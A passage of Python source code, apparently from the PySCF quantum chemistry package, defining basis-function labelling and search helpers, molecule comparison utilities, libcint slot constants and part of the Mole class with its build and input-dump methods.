cart_labels(mol, fmt=True):\n '''Labels for Cartesian GTO functions\n\n Kwargs:\n fmt : str or bool\n if fmt is boolean, it controls whether to format the labels and the\n default format is \"%d%3s %s%-4s\". 
if fmt is string, the string will\n be used as the print format.\n\n Returns:\n List of [(atom-id, symbol-str, nl-str, str-of-real-spheric-notation)]\n or formatted strings based on the argument \"fmt\"\n '''\n count = numpy.zeros((mol.natm, 9), dtype=int)\n label = []\n for ib in range(len(mol._bas)):\n ia = mol.bas_atom(ib)\n l = mol.bas_angular(ib)\n strl = param.ANGULAR[l]\n nc = mol.bas_nctr(ib)\n symb = mol.atom_symbol(ia)\n nelec_ecp = mol.atom_nelec_core(ia)\n if nelec_ecp == 0 or l > 3:\n shl_start = count[ia,l]+l+1\n else:\n coreshl = pyscf.gto.ecp.core_configuration(nelec_ecp)\n shl_start = coreshl[l]+count[ia,l]+l+1\n for n in range(shl_start, shl_start+nc):\n for lx in reversed(range(l+1)):\n for ly in reversed(range(l+1-lx)):\n lz = l - lx - ly\n label.append((ia, symb, '%d%s' % (n, strl),\n ''.join(('x'*lx, 'y'*ly, 'z'*lz))))\n count[ia,l] += nc\n if isinstance(fmt, str):\n return [(fmt % x) for x in label]\n elif fmt:\n return ['%d%3s %s%-4s' % x for x in label]\n else:\n return label\n\n\ndef spinor_labels(mol):\n raise RuntimeError('TODO')\n\ndef search_shell_id(mol, atm_id, l):\n '''Search the first basis/shell id (**not** the basis function id) which\n matches the given atom-id and angular momentum\n\n Args:\n atm_id : int\n atom id, 0-based\n l : int\n angular momentum\n\n Returns:\n basis id, 0-based. If not found, return None\n\n Examples:\n\n >>> mol = gto.M(atom='H 0 0 0; Cl 0 0 1', basis='sto-3g')\n >>> mol.search_shell_id(1, 1) # Cl p shell\n 4\n >>> mol.search_shell_id(1, 2) # Cl d shell\n None\n '''\n for ib in range(len(mol._bas)):\n ia = mol.bas_atom(ib)\n l1 = mol.bas_angular(ib)\n if ia == atm_id and l1 == l:\n return ib\n\ndef search_ao_nr(mol, atm_id, l, m, atmshell):\n '''Search the first basis function id (**not** the shell id) which matches\n the given atom-id, angular momentum, magnetic angular momentum, and principal shell.\n\n Args:\n atm_id : int\n atom id, 0-based\n l : int\n angular momentum\n m : int\n magnetic angular momentum\n atmshell : int\n principal quantum number\n\n Returns:\n basis function id, 0-based. If not found, return None\n\n Examples:\n\n >>> mol = gto.M(atom='H 0 0 0; Cl 0 0 1', basis='sto-3g')\n >>> mol.search_ao_nr(1, 1, -1, 3) # Cl 3px\n 7\n '''\n ibf = 0\n for ib in range(len(mol._bas)):\n ia = mol.bas_atom(ib)\n l1 = mol.bas_angular(ib)\n nc = mol.bas_nctr(ib)\n if ia == atm_id and l1 == l:\n if atmshell > nc+l1:\n atmshell = atmshell - nc\n else:\n return ibf + (atmshell-l1-1)*(l1*2+1) + (l1+m)\n ibf += (l1*2+1) * nc\n\ndef search_ao_r(mol, atm_id, l, j, m, atmshell):\n raise RuntimeError('TODO')\n#TODO: ibf = 0\n#TODO: for ib in range(len(mol._bas)):\n#TODO: ia = mol.bas_atom(ib)\n#TODO: l1 = mol.bas_angular(ib)\n#TODO: nc = mol.bas_nctr(ib)\n#TODO: k = mol.bas_kappa(bas_id)\n#TODO: degen = len_spinor(l1, k)\n#TODO: if ia == atm_id and l1 == l and k == kappa:\n#TODO: if atmshell > nc+l1:\n#TODO: atmshell = atmshell - nc\n#TODO: else:\n#TODO: return ibf + (atmshell-l1-1)*degen + (degen+m)\n#TODO: ibf += degen\n\n
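# --- Added note (not part of the original pyscf source): the two offset helpers below\n# each return one (start-shell-id, stop-shell-id, start-AO-id, stop-AO-id) tuple per\n# atom, which makes it easy to slice atom-diagonal blocks out of an AO matrix, e.g.:\n#   for b0, b1, p0, p1 in offset_nr_by_atom(mol):\n#       blk = dm[p0:p1, p0:p1]   # block of a density matrix belonging to one atom\n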
def offset_nr_by_atom(mol):\n '''Non-relativistic AO offset for each atom. Return a list, each item\n of the list gives (start-shell-id, stop-shell-id, start-AO-id, stop-AO-id)\n '''\n aorange = []\n p0 = p1 = 0\n b0 = b1 = 0\n ia0 = 0\n for ib in range(mol.nbas):\n if ia0 != mol.bas_atom(ib):\n aorange.append((b0, ib, p0, p1))\n ia0 = mol.bas_atom(ib)\n p0 = p1\n b0 = ib\n p1 += (mol.bas_angular(ib)*2+1) * mol.bas_nctr(ib)\n aorange.append((b0, mol.nbas, p0, p1))\n return aorange\n\ndef offset_2c_by_atom(mol):\n '''2-component AO offset for each atom. Return a list, each item\n of the list gives (start-shell-id, stop-shell-id, start-AO-id, stop-AO-id)\n '''\n aorange = []\n p0 = p1 = 0\n b0 = b1 = 0\n ia0 = 0\n for ib in range(mol.nbas):\n if ia0 != mol.bas_atom(ib):\n aorange.append((b0, ib, p0, p1))\n ia0 = mol.bas_atom(ib)\n p0 = p1\n b0 = ib\n p1 += mol.bas_len_spinor(ib) * mol.bas_nctr(ib)\n aorange.append((b0, mol.nbas, p0, p1))\n return aorange\n\ndef same_mol(mol1, mol2, tol=1e-5, cmp_basis=True, ignore_chiral=False):\n '''Compare two molecules to determine whether they have the same structure.\n\n Kwargs:\n tol : float\n In Bohr\n cmp_basis : bool\n Whether to compare basis functions for the two molecules\n '''\n import pyscf.symm\n\n if mol1._atom.__len__() != mol2._atom.__len__():\n return False\n\n chg1 = mol1._atm[:,CHARGE_OF]\n chg2 = mol2._atm[:,CHARGE_OF]\n if not numpy.all(numpy.sort(chg1) == numpy.sort(chg2)):\n return False\n\n if cmp_basis:\n atomtypes1 = atom_types(mol1._atom, mol1._basis)\n atomtypes2 = atom_types(mol2._atom, mol2._basis)\n for k in atomtypes1:\n if k not in atomtypes2:\n return False\n elif len(atomtypes1[k]) != len(atomtypes2[k]):\n return False\n elif mol1._basis[k] != mol2._basis[k]:\n return False\n\n def finger(mol, chgs, coord):\n center = charge_center(mol._atom, chgs, coord)\n im = inertia_momentum(mol._atom, chgs, coord)\n w, v = numpy.linalg.eigh(im)\n axes = v.T\n if numpy.linalg.det(axes) < 0:\n axes *= -1\n r = numpy.dot(coord-center, axes.T)\n return w, r\n\n coord1 = mol1.atom_coords()\n coord2 = mol2.atom_coords()\n w1, r1 = finger(mol1, chg1, coord1)\n w2, r2 = finger(mol2, chg2, coord2)\n if not (numpy.allclose(w1, w2, atol=tol)):\n return False\n\n rotate_xy = numpy.array([[-1., 0., 0.],\n [ 0.,-1., 0.],\n [ 0., 0., 1.]])\n rotate_yz = numpy.array([[ 1., 0., 0.],\n [ 0.,-1., 0.],\n [ 0., 0.,-1.]])\n rotate_zx = numpy.array([[-1., 0., 0.],\n [ 0., 1., 0.],\n [ 0., 0.,-1.]])\n\n def inspect(z1, r1, z2, r2):\n place = int(-numpy.log10(tol)) - 1\n idx = pyscf.symm.argsort_coords(r2, place)\n z2 = z2[idx]\n r2 = r2[idx]\n for rot in (1, rotate_xy, rotate_yz, rotate_zx):\n r1new = numpy.dot(r1, rot)\n idx = pyscf.symm.argsort_coords(r1new, place)\n if (numpy.all(z1[idx] == z2) and\n numpy.allclose(r1new[idx], r2, atol=tol)):\n return True\n return False\n\n return (inspect(chg1, r1, chg2, r2) or\n (ignore_chiral and inspect(chg1, r1, chg2, -r2)))\nis_same_mol = same_mol\n\ndef chiral_mol(mol1, mol2=None):\n '''Detect whether the given molecule is a chiral molecule, or whether two molecules\n are chiral isomers.\n '''\n if mol2 is None:\n mol2 = mol1.copy()\n ptr_coord = mol2._atm[:,PTR_COORD]\n mol2._env[ptr_coord ] *= -1\n mol2._env[ptr_coord+1] *= -1\n mol2._env[ptr_coord+2] *= -1\n return (not same_mol(mol1, mol2, ignore_chiral=False) and\n same_mol(mol1, mol2, ignore_chiral=True))\n\ndef inertia_momentum(atoms, charges=None, coords=None):\n if charges is None:\n charges = numpy.array([_charge(a[0]) for a in atoms])\n if coords is None:\n coords = numpy.array([a[1] for a in atoms], dtype=float)\n chgcenter = 
numpy.einsum('i,ij->j', charges, coords)/charges.sum()\n coords = coords - chgcenter\n im = numpy.einsum('i,ij,ik->jk', charges, coords, coords)/charges.sum()\n return im\n\ndef charge_center(atoms, charges=None, coords=None):\n if charges is None:\n charges = numpy.array([_charge(a[0]) for a in atoms])\n if coords is None:\n coords = numpy.array([a[1] for a in atoms], dtype=float)\n rbar = numpy.einsum('i,ij->j', charges, coords)/charges.sum()\n return rbar\n\ndef mass_center(atoms):\n mass = numpy.array([param.ELEMENTS[_charge(a[0])][1] for a in atoms])\n return charge_center(atoms, mass)\n\ndef condense_to_shell(mol, mat, compressor=numpy.max):\n '''The given matrix is first partitioned to blocks, based on AO shell as\n delimiter. Then call compressor function to abstract each block.\n '''\n ao_loc = mol.ao_loc_nr()\n abstract = numpy.empty((mol.nbas,mol.nbas))\n for i, i0 in enumerate(ao_loc[:mol.nbas]):\n for j, j0 in enumerate(ao_loc[:mol.nbas]):\n abstract[i,j] = compressor(mat[i0:ao_loc[i+1],j0:ao_loc[j+1]])\n return abstract\n\n\ndef check_sanity(obj, keysref, stdout=sys.stdout):\n sys.stderr.write('Function pyscf.gto.mole.check_sanity will be removed in PySCF-1.1. '\n 'It is replaced by pyscf.lib.check_sanity\\n')\n return pyscf.lib.check_sanity(obj, keysref, stdout)\n\n\n# for _atm, _bas, _env\nCHARGE_OF = 0\nPTR_COORD = 1\nNUC_MOD_OF = 2\nPTR_ZETA = 3\nATM_SLOTS = 6\nATOM_OF = 0\nANG_OF = 1\nNPRIM_OF = 2\nNCTR_OF = 3\nRADI_POWER = 3 # for ECP\nKAPPA_OF = 4\nPTR_EXP = 5\nPTR_COEFF = 6\nBAS_SLOTS = 8\n# pointer to env\nPTR_LIGHT_SPEED = 0\nPTR_COMMON_ORIG = 1\nPTR_RINV_ORIG = 4\nPTR_RINV_ZETA = 7\nPTR_RANGE_OMEGA = 8\nPTR_ECPBAS_OFFSET = 18\nPTR_NECPBAS = 19\nPTR_ENV_START = 20\n# parameters from libcint\nNUC_POINT = 1\nNUC_GAUSS = 2\n\n\n#\n# Mole class handles three layers: input, internal format, libcint arguments.\n# The relationship of the three layers is, e.g.\n# .atom (input) <=> ._atom (for python) <=> ._atm (for libcint)\n# .basis (input) <=> ._basis (for python) <=> ._bas (for libcint)\n# input layer does not talk to libcint directly. Data are held in the python\n# internal format layer. Most of the methods defined in this class operate only\n# on the internal format. Exceptions are make_env, make_atm_env, make_bas_env,\n# set_common_orig_, set_rinv_orig_ which are used to manipulate the libcint arguments.\n#\nclass Mole(pyscf.lib.StreamObject):\n '''Basic class to hold molecular structure and global options\n\n Attributes:\n verbose : int\n Print level\n output : str or None\n Output file, default is None which dumps msg to sys.stdout\n max_memory : int, float\n Allowed memory in MB\n light_speed :\n Default is set in lib.parameters.LIGHTSPEED\n charge : int\n Charge of molecule. It affects the electron numbers\n spin : int\n 2S, num. alpha electrons - num. beta electrons\n symmetry : bool or str\n Whether to use symmetry. When this variable is set to True, the\n molecule will be rotated and the highest rotation axis will be\n placed on the z-axis.\n If a string is given as the name of point group, the given point\n group symmetry will be used. Note that the input molecular\n coordinates will not be changed in this case.\n symmetry_subgroup : str\n subgroup\n\n atom : list or str\n To define molecular structure. 
The internal format is\n\n | atom = [[atom1, (x, y, z)],\n | [atom2, (x, y, z)],\n | ...\n | [atomN, (x, y, z)]]\n\n unit : str\n Angstrom or Bohr\n basis : dict or str\n To define basis set.\n nucmod : dict or str\n Nuclear model\n\n ** Following attributes are generated by :func:`Mole.build` **\n\n stdout : file object\n Default is sys.stdout if :attr:`Mole.output` is not set\n groupname : str\n One of D2h, C2h, C2v, D2, Cs, Ci, C2, C1\n nelectron : int\n sum of nuclear charges - :attr:`Mole.charge`\n symm_orb : a list of numpy.ndarray\n Symmetry adapted basis. Each element is a set of symm-adapted orbitals\n for one irreducible representation. The list index does **not** correspond\n to the id of irreducible representation.\n irrep_id : a list of int\n Each element is one irreducible representation id associated with the basis\n stored in symm_orb. One irrep id stands for one irreducible representation\n symbol. The irrep symbol and the relevant id are defined in\n :attr:`symm.parameters.IRREP_ID_TABLE`\n irrep_name : a list of str\n Each element is one irreducible representation symbol associated with the basis\n stored in symm_orb. The irrep symbols are defined in\n :attr:`symm.parameters.IRREP_ID_TABLE`\n _built : bool\n To label whether :func:`Mole.build` has been called. It ensures some functions\n being initialized once.\n _basis : dict\n like :attr:`Mole.basis`, the internal format which is returned from the\n parser :func:`format_basis`\n _keys : a set of str\n Store the keys that appear in the module. It is used to check for mistyped attributes\n\n ** Following attributes are arguments used by ``libcint`` library **\n\n _atm :\n :code:`[[charge, ptr-of-coord, nuc-model, ptr-zeta, 0, 0], [...]]`\n each element represents one atom\n natm :\n number of atoms\n _bas :\n :code:`[[atom-id, angular-momentum, num-primitive-GTO, num-contracted-GTO, 0, ptr-of-exps, ptr-of-contract-coeff, 0], [...]]`\n each element represents one shell\n nbas :\n number of shells\n _env :\n list of floats to store the coordinates, GTO exponents, contract-coefficients\n\n Examples:\n\n >>> mol = Mole(atom='H^2 0 0 0; H 0 0 1.1', basis='sto3g').build()\n >>> print(mol.atom_symbol(0))\n H^2\n >>> print(mol.atom_pure_symbol(0))\n H\n >>> print(mol.nao_nr())\n 2\n >>> print(mol.intor('cint1e_ovlp_sph'))\n [[ 0.99999999 0.43958641]\n [ 0.43958641 0.99999999]]\n >>> mol.charge = 1\n >>> mol.build()\n has no attributes Charge\n\n '''\n def __init__(self, **kwargs):\n self.verbose = logger.NOTE\n self.output = None\n self.max_memory = param.MEMORY_MAX\n\n self.light_speed = param.LIGHTSPEED\n self.charge = 0\n self.spin = 0 # 2j == nelec_alpha - nelec_beta\n self.symmetry = False\n self.symmetry_subgroup = None\n\n# Save inputs\n# self.atom = [(symb/nuc_charge, (coord(Angstrom):0.,0.,0.)), ...]\n self.atom = []\n# the unit (angstrom/bohr) of the coordinates defined by the input self.atom\n self.unit = 'angstrom'\n# self.basis = {atom_type/nuc_charge: [l, kappa, (expnt, c_1, c_2,..),..]}\n self.basis = 'sto-3g'\n# self.nucmod = {atom_symbol: nuclear_model, atom_id: nuc_mod}, atom_id is 1-based\n self.nucmod = {}\n# self.ecp = {atom_symbol: [[l, (r_order, expnt, c),...]]}\n self.ecp = {}\n##################################################\n# don't modify the following private variables, they are not input options\n self._atm = []\n self._bas = []\n self._env = [0] * PTR_ENV_START\n self._ecpbas = []\n\n self.stdout = sys.stdout\n self.groupname = 'C1'\n self.topgroup = 'C1'\n self.symm_orb = None\n self.irrep_id = None\n self.irrep_name = None\n 
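# (added comment, not in the original source) symm_orb, irrep_id and irrep_name\n # above are populated by Mole.build() when self.symmetry is enabled\n 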
self.incore_anyway = False\n self._nelectron = None\n self._atom = None\n self._basis = None\n self._ecp = None\n self._built = False\n self._keys = set(self.__dict__.keys())\n self.__dict__.update(kwargs)\n\n @property\n def natm(self):\n return len(self._atm)\n @property\n def nbas(self):\n return len(self._bas)\n\n @property\n def nelec(self):\n nalpha = (self.nelectron+self.spin)//2\n nbeta = nalpha - self.spin\n return nalpha, nbeta\n @property\n def nelectron(self):\n if self._nelectron is None:\n return tot_electrons(self)\n else:\n return self._nelectron\n @nelectron.setter\n def nelectron(self, n):\n self._nelectron = n\n\n# need \"deepcopy\" here because in shallow copy, _env may get new elements but\n# with ptr_env unchanged\n# def __copy__(self):\n# cls = self.__class__\n# newmol = cls.__new__(cls)\n# newmol = ...\n# do not use __copy__ to avoid iteratively calling copy.copy\n def copy(self):\n return copy(self)\n\n pack = pack\n @pyscf.lib.with_doc(unpack.__doc__)\n def unpack(self, moldic):\n return unpack(moldic)\n def unpack_(self, moldic):\n self.__dict__.update(moldic)\n return self\n\n dumps = dumps\n @pyscf.lib.with_doc(loads.__doc__)\n def loads(self, molstr):\n return loads(molstr)\n def loads_(self, molstr):\n self.__dict__.update(loads(molstr).__dict__)\n return self\n\n#TODO: remove kwarg mass=None. Here to keep compatibility to old chkfile format\n def build(self, dump_input=True, parse_arg=True,\n verbose=None, output=None, max_memory=None,\n atom=None, basis=None, unit=None, nucmod=None, ecp=None,\n charge=None, spin=None, symmetry=None,\n symmetry_subgroup=None, light_speed=None, mass=None):\n '''Set up the molecule and initialize some control parameters. Whenever you\n change the value of the attributes of :class:`Mole`, you need to call\n this function to refresh the internal data of Mole.\n\n Kwargs:\n dump_input : bool\n whether to dump the contents of input file in the output file\n parse_arg : bool\n whether to read the sys.argv and overwrite the relevant parameters\n verbose : int\n Print level. If given, overwrite :attr:`Mole.verbose`\n output : str or None\n Output file. If given, overwrite :attr:`Mole.output`\n max_memory : int, float\n Allowed memory in MB. If given, overwrite :attr:`Mole.max_memory`\n atom : list or str\n To define molecular structure.\n basis : dict or str\n To define basis set.\n nucmod : dict or str\n Nuclear model. If given, overwrite :attr:`Mole.nucmod`\n charge : int\n Charge of molecule. It affects the electron numbers\n If given, overwrite :attr:`Mole.charge`\n spin : int\n 2S, num. alpha electrons - num. beta electrons\n If given, overwrite :attr:`Mole.spin`\n symmetry : bool or str\n Whether to use symmetry. 
If given a string of point group\n name, the given point group symmetry will be used.\n light_speed :\n If given, overwrite :attr:`Mole.light_speed`\n\n '''\n# release circular referred objs\n# Note obj.x = obj.member_function causes circular referrence\n gc.collect()\n\n if verbose is not None: self.verbose = verbose\n if output is not None: self.output = output\n if max_memory is not None: self.max_memory = max_memory\n if atom is not None: self.atom = atom\n if basis is not None: self.basis = basis\n if unit is not None: self.unit = unit\n if nucmod is not None: self.nucmod = nucmod\n if ecp is not None: self.ecp = ecp\n if charge is not None: self.charge = charge\n if spin is not None: self.spin = spin\n if symmetry is not None: self.symmetry = symmetry\n if symmetry_subgroup is not None: self.symmetry_subgroup = symmetry_subgroup\n if light_speed is not None: self.light_speed = light_speed\n\n if parse_arg:\n _update_from_cmdargs_(self)\n\n # avoid to open output file twice\n if parse_arg and self.output is not None \\\n and self.stdout.name != self.output:\n self.stdout = open(self.output, 'w')\n\n if self.verbose >= logger.WARN:\n self.check_sanity()\n\n self._atom = self.format_atom(self.atom, unit=self.unit)\n uniq_atoms = set([a[0] for a in self._atom])\n\n if isinstance(self.basis, str):\n # specify global basis for whole molecule\n self._basis = self.format_basis(dict([(a, self.basis)\n for a in uniq_atoms]))\n else:\n self._basis = self.format_basis(self.basis)\n\n# TODO: Consider ECP info into symmetry\n if self.ecp:\n if isinstance(self.ecp, str):\n self._ecp = self.format_ecp(dict([(a, self.ecp)\n for a in uniq_atoms]))\n else:\n self._ecp = self.format_ecp(self.ecp)\n\n if self.symmetry:\n import pyscf.symm\n if isinstance(self.symmetry, str):\n self.symmetry = pyscf.symm.std_symb(self.symmetry)\n self.topgroup = self.symmetry\n orig = 0\n axes = numpy.eye(3)\n self.groupname, axes = pyscf.symm.subgroup(self.topgroup, axes)\n if not pyscf.symm.check_given_symm(self.groupname, self._atom,\n self._basis):\n self.topgroup, orig, axes = \\\n pyscf.symm.detect_symm(self._atom, self._basis)\n self.groupname, axes = pyscf.symm.subgroup(self.topgroup, axes)\n _atom = self.format_atom(self._atom, orig, axes, 'Bohr')\n _atom = '\\n'.join([str(a) for a in _atom])\n raise RuntimeWarning('Unable to identify input symmetry %s.\\n'\n 'Try symmetry=\"%s\" with geometry (unit=\"Bohr\")\\n%s' %\n (self.symmetry, self.topgroup, _atom))\n else:\n self.topgroup, orig, axes = \\\n pyscf.symm.detect_symm(self._atom, self._basis)\n self.groupname, axes = pyscf.symm.subgroup(self.topgroup, axes)\n if isinstance(self.symmetry_subgroup, str):\n self.symmetry_subgroup = \\\n pyscf.symm.std_symb(self.symmetry_subgroup)\n assert(self.symmetry_subgroup in\n pyscf.symm.param.SUBGROUP[self.groupname])\n if (self.symmetry_subgroup == 'Cs' and self.groupname == 'C2v'):\n raise RuntimeError('TODO: rotate mirror or axes')\n self.groupname = self.symmetry_subgroup\n# Note the internal _format is in Bohr\n self._atom = self.format_atom(self._atom, orig, axes, 'Bohr')\n\n self._env[PTR_LIGHT_SPEED] = self.light_speed\n self._atm, self._bas, self._env = \\\n self.make_env(self._atom, self._basis, self._env, self.nucmod)\n self._atm, self._ecpbas, self._env = \\\n self.make_ecp_env(self._atm, self._ecp, self._env)\n if (self.nelectron+self.spin) % 2 != 0:\n raise RuntimeError('Electron number %d and spin %d are not consistent\\n'\n 'Note spin = 2S = Nalpha-Nbeta, not the definition 2S+1' %\n (self.nelectron, 
self.spin))\n\n if self.symmetry:\n import pyscf.symm\n try:\n eql_atoms = pyscf.symm.symm_identical_atoms(self.groupname, self._atom)\n except RuntimeError:\n raise RuntimeError('''Given symmetry and molecule structure do not match.\nNote that when the symmetry attribute is assigned, the molecule needs to be put in the proper orientation.''')\n self.symm_orb, self.irrep_id = \\\n pyscf.symm.symm_adapted_basis(self.groupname, eql_atoms,\n self._atom, self._basis)\n self.irrep_name = [pyscf.symm.irrep_id2name(self.groupname, ir)\n for ir in self.irrep_id]\n\n if dump_input and not self._built and self.verbose > logger.NOTE:\n self.dump_input()\n\n logger.debug3(self, 'arg.atm = %s', str(self._atm))\n logger.debug3(self, 'arg.bas = %s', str(self._bas))\n logger.debug3(self, 'arg.env = %s', str(self._env))\n logger.debug3(self, 'ecpbas = %s', str(self._ecpbas))\n\n self._built = True\n return self\n kernel = build\n\n @pyscf.lib.with_doc(format_atom.__doc__)\n def format_atom(self, atom, origin=0, axes=1, unit='Ang'):\n return format_atom(atom, origin, axes, unit)\n\n @pyscf.lib.with_doc(format_basis.__doc__)\n def format_basis(self, basis_tab):\n return format_basis(basis_tab)\n\n @pyscf.lib.with_doc(format_ecp.__doc__)\n def format_ecp(self, ecp_tab):\n return format_ecp(ecp_tab)\n\n @pyscf.lib.with_doc(expand_etb.__doc__)\n def expand_etb(self, l, n, alpha, beta):\n return expand_etb(l, n, alpha, beta)\n\n @pyscf.lib.with_doc(expand_etbs.__doc__)\n def expand_etbs(self, etbs):\n return expand_etbs(etbs)\n etbs = expand_etbs\n\n def make_env(self, atoms, basis, pre_env=[], nucmod={}):\n return make_env(atoms, basis, pre_env, nucmod)\n\n def make_atm_env(self, atom, ptr=0):\n return make_atm_env(atom, ptr)\n\n def make_bas_env(self, basis_add, atom_id=0, ptr=0):\n return make_bas_env(basis_add, atom_id, ptr)\n\n def make_ecp_env(self, _atm, _ecp, pre_env=[]):\n if _ecp:\n _atm, _ecpbas, _env = make_ecp_env(self, _atm, _ecp, pre_env)\n else:\n _atm, _ecpbas, _env = _atm, [], pre_env\n return _atm, _ecpbas, _env\n\n tot_electrons = tot_electrons\n\n @pyscf.lib.with_doc(gto_norm.__doc__)\n def gto_norm(self, l, expnt):\n return gto_norm(l, expnt)\n\n\n def dump_input(self):\n import __main__\n if hasattr(__main__, '__file__'):\n try:\n filename = os.path.abspath(__main__.__file__)\n finput = open(filename, 'r')\n self.stdout.write('\\n')\n self.stdout.write('INFO: **** input file is %s ****\\n' % filename)\n self.stdout.write(finput.read())\n self.stdout.write('INFO: ******************** input file end ********************\\n')\n self.stdout.write('\\n')\n finput.close()\n except IOError:\n logger.warn(self, 'input file does not exist')\n\n self.stdout.write('System: %s\\n' % str(platform.uname()))\n self.stdout.write('Date: %s\\n' % time.ctime())\n try:\n import pyscf\n pyscfdir = os.path.abspath(os.path.join(__file__, '..', '..'))\n self.stdout.write('PySCF version %s\\n' % pyscf.__version__)\n self.stdout.write('PySCF path %s\\n' % pyscfdir)\n with open(os.path.join(pyscfdir, '.git', 'ORIG_HEAD')) as f:\n self.stdout.write('GIT ORIG_HEAD %s' % f.read())\n head = os.path.join(pyscfdir, '.git', 'HEAD')\n with open(head, 'r') as f:\n head = f.read().splitlines()[0]\n self.stdout.write('GIT HEAD %s\\n' % head)\n # or command(git log -1 --pretty=%H)\n if head.startswith('ref:'):\n branch = os.path.basename(head)\n head = os.path.join(pyscfdir, '.git', head.split(' ')[1])\n with open(head, 'r') as f:\n self.stdout.write('GIT %s branch %s' % (branch, f.readline()))\n self.stdout.write('\\n')\n except 
IOError:\n pass\n\n self.stdout.write('[INPUT] VERBOSE %d\\n' % self.verbose)\n self.stdout.write('[INPUT] light speed = %s\\n' % self.light_speed)\n self.stdout.write('[INPUT] num atoms = %d\\n' % self.natm)\n self.stdout.write('[INPUT] num electrons = %d\\n' % self.nelectron)\n self.stdout.write('[INPUT] charge = %d\\n' % self.charge)\n self.stdout.write('[INPUT] spin (= nelec alpha-beta = 2S) = %d\\n' % self.spin)\n\n for ia,atom in enumerate(self._atom):\n coorda = tuple([x * param.BOHR for x in atom[1]])\n coordb = tuple([x for x in atom[1]])\n self.stdout.write('[INPUT]%3d %-4s %16.12f %16.12f %16.12f AA '\\\n '%16.12f %16.12f %16.12f Bohr\\n' \\\n % ((ia+1, _symbol(atom[0])) + coorda + coordb))\n if self.nucmod:\n self.stdout.write('[INPUT] Gaussian nuclear model for atoms %s\\n' %\n self.nucmod.keys())\n\n self.stdout.write('[INPUT] ---------------- BASIS SET ---------------- \\n')\n self.stdout.write('[INPUT] l, kappa, [nprim/nctr], ' \\\n 'expnt, c_1 c_2 ...\\n')\n for atom, basis in self._basis.items():\n self.stdout.write('[INPUT] %s\\n' % atom)\n for b in basis:\n if isinstance(b[1], int):\n kappa = b[1]\n b_coeff = b[2:]\n else:\n kappa = 0\n b_coeff = b[1:]\n self.stdout.write('[INPUT] %d %2d [%-5d/%-4d] ' \\\n % (b[0], kappa, b_coeff.__len__(), \\\n b_coeff[0].__len__()-1))\n for k, x in enumerate(b_coeff):\n if k == 0:\n self.stdout.write('%-15.12g ' % x[0])\n else:\n self.stdout.write(' '*32+'%-15.12g ' % x[0])\n for c in x[1:]:\n self.stdout.write(' %4.12g' % c)\n self.stdout.write('\\n')\n\n logger.info(self, 'nuclear repulsion = %.15g', self.energy_nuc())\n if self.symmetry:\n if self.topgroup == self.groupname:\n logger.info(self, 'point group symmetry = %s', self.topgroup)\n else:\n logger.info(self, 'point group symmetry = %s, use subgroup %s',\n self.topgroup, self.groupname)\n for ir in range(self.symm_orb.__len__()):\n logger.info(self, 'num. orbitals of irrep %s = %d',\n self.irrep_name[ir], self.symm_orb[ir].shape[1])\n logger.info(self, 'number of shells = %d', self.nbas)\n logger.info(self, 'number of NR pGTOs = %d', self.npgto_nr())\n logger.info(self, 'number of NR cGTOs = %d', self.nao_nr())\n if self.verbose >= logger.DEBUG1:\n for i in range(len(self._bas)):\n exps = self.bas_exp(i)\n logger.debug1(self, 'bas %d, expnt(s) = %s', i, str(exps))\n\n logger.info(self, 'CPU time: %12.2f', time.clock())\n return self\n\n def set_common_orig(self, coord):\n '''Update common origin which held in :class`Mole`._env. **Note** the unit is Bohr\n\n Examples:\n\n >>> mol.set_common_orig(0)\n >>> mol.set_common_orig((1,0,0))\n '''\n self._env[PTR_COMMON_ORIG:PTR_COMMON_ORIG+3] = coord\n return self\n set_common_origin = set_common_orig\n set_common_orig_ = set_common_orig # for backward compatibility\n set_common_origin_ = set_common_orig # for backward compatibility\n\n def set_rinv_orig(self, coord):\n r'''Update origin for operator :math:`\\frac{1}{|r-R_O|}`. 
**Note** the unit is Bohr\n\n Examples:\n\n >>> mol.set_rinv_orig(0)\n >>> mol.set_rinv_orig((0,1,0))\n '''\n self._env[PTR_RINV_ORIG:PTR_RINV_ORIG+3] = coord[:3]\n return self\n set_rinv_origin = set_rinv_orig\n set_rinv_orig_ = set_rinv_orig # for backward compatibility\n set_rinv_origin_ = set_rinv_orig # for backward compatibility\n\n def set_range_coulomb(self, omega):\n '''Apply the long range part of range-separated Coulomb operator for\n **all** 2e integrals\n erf(omega r12) / r12\n set omega to 0 to switch off the range-separated Coulomb\n '''\n self._env[PTR_RANGE_OMEGA] = omega\n set_range_coulomb_ = set_range_coulomb # for backward compatibility\n\n def set_nuc_mod(self, atm_id, zeta):\n '''Change the nuclear charge distribution of the given atom ID. The charge\n distribution is defined as: rho(r) = nuc_charge * Norm * exp(-zeta * r^2).\n This function can **only** be called after .build() method is executed.\n\n Examples:\n\n >>> for ia in range(mol.natm):\n ... zeta = gto.filatov_nuc_mod(mol.atom_charge(ia))\n ... mol.set_nuc_mod(ia, zeta)\n '''\n ptr = self._atm[atm_id,PTR_ZETA]\n self._env[ptr] = zeta\n return self\n set_nuc_mod_ = set_nuc_mod # for backward compatibility\n\n def set_rinv_zeta(self, zeta):\n '''Assume the charge distribution on the \"rinv_orig\". zeta is the parameter\n to control the charge distribution: rho(r) = Norm * exp(-zeta * r^2).\n **Be careful** when calling this function. It affects the behavior of\n cint1e_rinv_* functions. Make sure to set it back to 0 after using it!\n '''\n self._env[PTR_RINV_ZETA] = zeta\n return self\n set_rinv_zeta_ = set_rinv_zeta # for backward compatibility\n\n 
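# --- Added illustration (not part of the original pyscf source): since the docstring\n # above warns that set_rinv_zeta changes the behavior of the cint1e_rinv_* integrals,\n # a typical guarded usage is:\n #   mol.set_rinv_orig((0., 0., 0.))\n #   mol.set_rinv_zeta(zeta)\n #   v = mol.intor('cint1e_rinv_sph')\n #   mol.set_rinv_zeta(0.)  # restore the default point-charge behavior\n\n 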
